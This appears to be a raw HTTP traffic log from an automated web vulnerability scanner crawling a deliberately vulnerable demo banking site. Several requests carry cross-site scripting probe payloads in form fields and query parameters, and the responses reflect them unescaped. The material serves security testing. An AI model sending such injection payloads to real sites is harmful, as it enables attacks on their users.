bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /_vti_bin/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_bin/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:44 GMT WWW-Authenticate: Negotiate WWW-Authenticate: NTLM Content-Length: 4431 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>You are not authorized to view this page</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li> <li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page.</li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <li>Background:<br> This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource. <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li> </p> </ul> </font></td> </tr> </table> </body> </html>
GET /login1.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:17 GMT X-Powered-By: ASP.NET Location: banklogin.asp?err=Invalid Login: Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /banklogin.asp?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:21 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4958 Content-Type: text/html Cache-control: private Set-Cookie: sessionid=; path=/ Set-Cookie: state=; path=/ Set-Cookie: username=; path=/ Set-Cookie: userid=; path=/ <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY> <TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black"> <TR> <TD STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3" HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150" HEIGHT="50"><BR><BR></TD> <TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47" VALIGN="TOP">&nbsp;</TD> <TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" VALIGN="TOP">&nbsp;</TD> </TR> <TR> <TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49"> <TABLE> <TR> <TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="217"> <FORM ACTION="login1.asp" METHOD="post"> <CENTER>Invalid Login: 333-333-3333test@test999.com<br>Username:<BR><INPUT TYPE="text" NAME="login" STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password" NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption" VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT TYPE="submit" STYLE="border: 1px solid black" VALUE=" Access Accounts "><BR></CENTER></FORM></TD> <TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217" ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266" BORDER="0"></TD> </TR> <TR> <TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241" VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to protect all transactions; however, this is not an invitation for people to attempt unauthorized access to the system. This is a private computing system which is restricted to authorized individuals. Actual or attempted unauthorized use of this computer system may result in criminal and/or civil prosecution. We reserve the right to view, monitor, and record activity on the system without notice or permission. Any information obtained by monitoring, reviewing, or recording is subject to review by law enforcement organizations in connection with the investigation or prosecution of possible criminal activity on the system. If you are not an authorized user of this system or do not consent to continued monitoring, exit the system at this time. </FONT></TD> </TR> </TABLE></TD> <TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5"> <tr> <td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p> <p><font size="2" face="Arial, Helvetica, sans-serif">If you would like a free trial version of WebInspect to test this website site.</font></p> <p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td> </tr> </table></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT" BORDER="0" WIDTH="150" HEIGHT="20"></A></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162" HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162" HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162" ALIGN="CENTER">&nbsp; <FORM ACTION="rootlogin.asp" METHOD="post"> <P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking Account with FreeBank:</FONT></P> <P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT TYPE="text" NAME="txtPassPhrase" STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1" FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName" STYLE="border: 1px solid black; spacing: 0"><BR> <INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user"> <INPUT TYPE="submit" STYLE="border: 1px solid black" VALUE="Register"></P></FORM></TD> </TR> </TABLE> </BODY> </HTML>
POST /rootlogin.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Content-Length: 127 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=>"><script>alert("XSS")</script>
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:38:08 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 108 Content-Type: text/html Cache-control: private <html> <body> Invalid Data >"><script>alert("XSS")</script><br>Please try again. </body> </html>
GET /forgot2.asp?msg2=no&msg=--><script>alert('XSS')</script> HTTP/1.0 Referer: http://zero.webappsecurity.com:80/forgot1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:03 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 1846 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Forgotten Password</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>F&nbsp;O&nbsp;R&nbsp;G&nbsp;O&nbsp;T&nbsp;T&nbsp;E&nbsp;N&nbsp;&nbsp;&nbsp;&nbsp;P&nbsp;A&nbsp;S&nbsp;S&nbsp;W&nbsp;O&nbsp;R&nbsp;D</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center">--><script>alert('XSS')</script></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#c000ff><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> </form> </Table> </table> </body> </html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/index.htm HTTP/1.0 Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/index.htm Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:23 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:10 GMT ETag: "a0d8d7fda9dc11:8f6" Content-Length: 37 <A HREF="./link8/index.htm">Link8</A>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=test@<script>alert(document.cookie)</script>.com&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:40 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:48 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3994 Content-Type: text/html Cache-control: private Set-Cookie: passes=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes3=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please provide us with the following details</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /stats/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:26:04 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4269 Content-Type: text/html Cache-control: private <html> <body topmargin=0 leftmargin=0 rightmargin=0 marginwidth=0 marginheight=0> <table bgcolor="white" border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td bgcolor="#3399FF" align="right" height=10 valign="middle" width="100%" colspan="3"> &nbsp; </td> </tr> <tr> <td align="center" width="30%"> </td> <td valign="middle"><img height="70" width="150"src="http://form-engine.com/images/fade.gif"></td> <td align="left" valign="middle" bgcolor="#cc0000" width="70%" valign="bottom"> &nbsp; <font face="Arial Black" color="#FFFFFF" size="6">Statistics </font> </td> </tr> <tr height="1"> <td align="right" width="100%" height="10" bgcolor="#3399FF" colspan="3"> &nbsp; </td> </tr> </table> <script language="Javascript"> <!-- function check() { if (document.login.email.value=="") { alert("Email Address is empty!"); return false; } if (document.login.password.value=="") { alert("Password is empty!"); return false; } } //--> </script> <p><br></p> <form method="POST" action="login1.asp" onsubmit="return check()" name="login"> <div align="center"> <center> <table border="0" cellpadding="0" cellspacing="0" width="347" height="247"> <tr bgcolor="#000000"> <td valign="top" align="left" height="25" width="11"><img border="0" src="http://asiadepot.com/images/pink1.gif" width="9" height="9"></td> <td valign="top" align="center" colspan="2" height="25" width="321"> <p align="center"><font color="#FFFFFF" face="Arial Black">Login</font></td> <td valign="top" align="right" height="25" width="9"><img border="0" src="http://asiadepot.com/images/pink2.gif" width="9" height="9"></td> </tr> <tr> <td colspan="4" bgcolor="#BDD6FF" align="center" height="30" width="343"><font face="arial, helvetica, sansserif" size="1">To log on to the statistics page.<br> Please type your name and password below.</font></td> </tr> <tr bgcolor="#BDD6FF"> <td height="25" width="11">&nbsp;</td> <td valign="middle" align="right" height="25" width="119"> <b> <font face="arial,helvetica,sans-serif" size="1">Username:&nbsp;</font></b> </td> <td valign="top" align="left" height="25" width="200"> <input type="text" size="19" maxlength="32" value="" name="email"></td> <td height="25" width="9">&nbsp;</td> </tr> <tr bgcolor="#BDD6FF"> <td height="25" width="11">&nbsp;</td> <td valign="middle" align="right" height="25" width="119"> <font face="arial,helvetica,sans-serif" size="1"> <b> Password: </b> </font> </td> <td valign="top" align="left" height="25" width="200"> <input type="password" size="19" maxlength="16" value="" name="password"> </td> <td height="25" width="9">&nbsp;</td> </tr> <tr bgcolor="#BDD6FF"> <td align="center" height="30" colspan="4" width="343"><input type="image" src="/images/log_me_blue_btn.gif" name="Login" width="96" height="26" border="0"></td> </tr> <tr bgcolor="#BDD6FF"> <td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1"> </font></td> </tr> <tr bgcolor="#BDD6FF"> <td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1"> </font></td> </tr> <tr bgcolor="#BDD6FF"> <td valign="bottom" align="left" height="21" width="11"><font size="1"><img border="0" src="http://asiadepot.com/images/pink3.gif" width="9" height="9"></font></td> <td height="21" colspan="2" width="321">&nbsp;</td> <td valign="bottom" align="right" height="21" width="9"><font size="1"><img border="0" src="http://asiadepot.com/images/pink4.gif" width="9" height="9"></font></td> </tr> <input type=hidden name=gotopage value=""> </table> </center> </div> </form> <hr size=1><p align=center> <FONT face="Arial, Geneva, Helvetica" size=2><a href="http://www.freebank.com">Copyright</a> 1999-2002&nbsp; www.freebank.com. All rights reserved <br><br> Powered by <a href="http://frontsql.com">FrontSQL</a> </font> </p>
